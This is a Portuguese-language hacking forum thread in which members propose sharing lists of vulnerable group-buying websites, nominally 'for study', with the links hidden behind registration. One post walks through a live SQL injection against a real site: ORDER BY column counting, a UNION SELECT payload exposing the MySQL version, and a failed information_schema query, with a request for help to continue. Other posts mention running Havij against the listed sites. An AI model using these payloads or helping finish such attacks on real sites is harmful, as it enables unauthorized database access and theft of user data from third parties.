Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sites Compras coletivas Vull

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Sites Compras coletivas Vull

    Pessoal, vamos postar aqui todos os sites de compras coletivas vulneraveis.

    Por favor, coloquem os links mais não coloquem senhas e nem logins, pois temos que incentivar os estudos da galera.

    Acabei de achar alguns:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Como queria mudar o mundo...mas infelizmente eles não me dão o código fonte!
    Similar Threads

  • Font Size
    #2
    Bom seria legal fazer postagem de vulneraveis pra galera aprender um pouco de SQLi e suas vulnerabilidades,mas quanto ao incetivo,não sei se muita gente iria estudar mesmo,muitos iriam apenas abrir o havij entrar na pagina e dizer que hackeou...Então como algums dizem que no GH não incentivamos Deface...
    Mas oque eu digo é o seguinte,mesmo com as postagems a galera não vai querer estudar,porque hoje em dia geralmente eles querem tudo de mão beijadas ae é dificil..Ou então iriam fazer igual eu disse abrir havij e falar que é o "HACKER FODÃO"..sabe..

    Mas seria legal mesmo incetivar a galera a estudar como tu disse,e não querer as coisas de mão beijadas como eles querem mesmo..
    leia O político honesto não pode ser encontrado

    O político que você estava procurando não pode ser encontrado ou não existe!
    É uma lenda, trocou de nome ou está eternamente fora do ar.

    Por favor tente o seguinte:

    Verifique se você está mesmo votando na pessoa certa.
    Aguarde algumas décadas para uma renovação.
    Não adianta clicar no botão Voltar e tentar outro.

    HTTP Error 404 - Político honesto não encontrado.
    Internet Information Services (IIS)

    Comment


    • Font Size
      #3
      Boa iniciativa .. So para saber estes tao vull ?? Vou verificar

      Intel core i7 2ªgeração, 8gb Ram, Intel HD 3000, HDD 500gb
      --------------------------------------------------------------------------------------

      Comment


      • Font Size
        #4
        Postado Originalmente por Tecsano Ver Post
        Pessoal, vamos postar aqui todos os sites de compras coletivas vulneraveis.

        Por favor, coloquem os links mais não coloquem senhas e nem logins, pois temos que incentivar os estudos da galera.

        Acabei de achar alguns:
        Boa iniciativa
        sigpic
        "Porque na muita sabedoria há muito enfado; e o que aumenta em conhecimento, aumenta em dor."

        Comment


        • Font Size
          #5
          Eu só espero que o pessoal não se meta a um de cracker...

          Por favor galera, nao faça bagunça nesses sites vull.

          É como eu falei, é um incentivo para aprender mais..

          valeu
          Como queria mudar o mundo...mas infelizmente eles não me dão o código fonte!

          Comment


          • Font Size
            #6
            Duvida...

            Olá Pessoal .. Estou começando agor ameus estudos com SqlInjection. Ja tenho uma noçao muito boa de sql e programação web. Estou seguindo aqui um tutorial. Es os passos que eu fiz:

            Site:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
            Descobrindo o numero de colunas da tabela:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "SEM ERRO"
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "COM ERRO"
            Logo a tabela possui 45 colunas ...
            Descobrindo a versao do Base de Dados:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45 --
            Resultado: 5.0.92-community-log
            O problema é justamente nesse ponto. Após essa etapa, estou tentando conseguir o nome da tabela usando a seguinte sql:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45 from information_schema.tables where table_schema = '5.0.92-community-log' limit 0,1--
            Mas o browser exibe o seguinte erro:
            You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'5.0.92-community-log\' limit 0,1--' at line 1
            Já tentei usar algumas variações para ver se conseguia resolver esse erro mas o mesmo persiste.. T.T

            Alguem saberia me dizer o que fazer para passar dessa etapa?

            ...
            ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


            sigpic

            Comment


            • Font Size
              #7
              Postado Originalmente por Tecsano Ver Post
              Eu só espero que o pessoal não se meta a um de cracker...

              Por favor galera, nao faça bagunça nesses sites vull.

              É como eu falei, é um incentivo para aprender mais..

              valeu
              Concordo 100%
              leia O político honesto não pode ser encontrado

              O político que você estava procurando não pode ser encontrado ou não existe!
              É uma lenda, trocou de nome ou está eternamente fora do ar.

              Por favor tente o seguinte:

              Verifique se você está mesmo votando na pessoa certa.
              Aguarde algumas décadas para uma renovação.
              Não adianta clicar no botão Voltar e tentar outro.

              HTTP Error 404 - Político honesto não encontrado.
              Internet Information Services (IIS)

              Comment


              • Font Size
                #8
                Realmente vdd Kzs,sou iniciante,acho que isso seria de mão beijada p gente e
                colocar no Havij e explorar o site vul
                Mas o incentivo é bom Tecsano,mas sempre temos uma ovelha negra em nosso meio
                que vai fazer algo e dizer ser o hacker bonzão,mas valeu pela inciciativa

                Comment

                X
                Working...
                X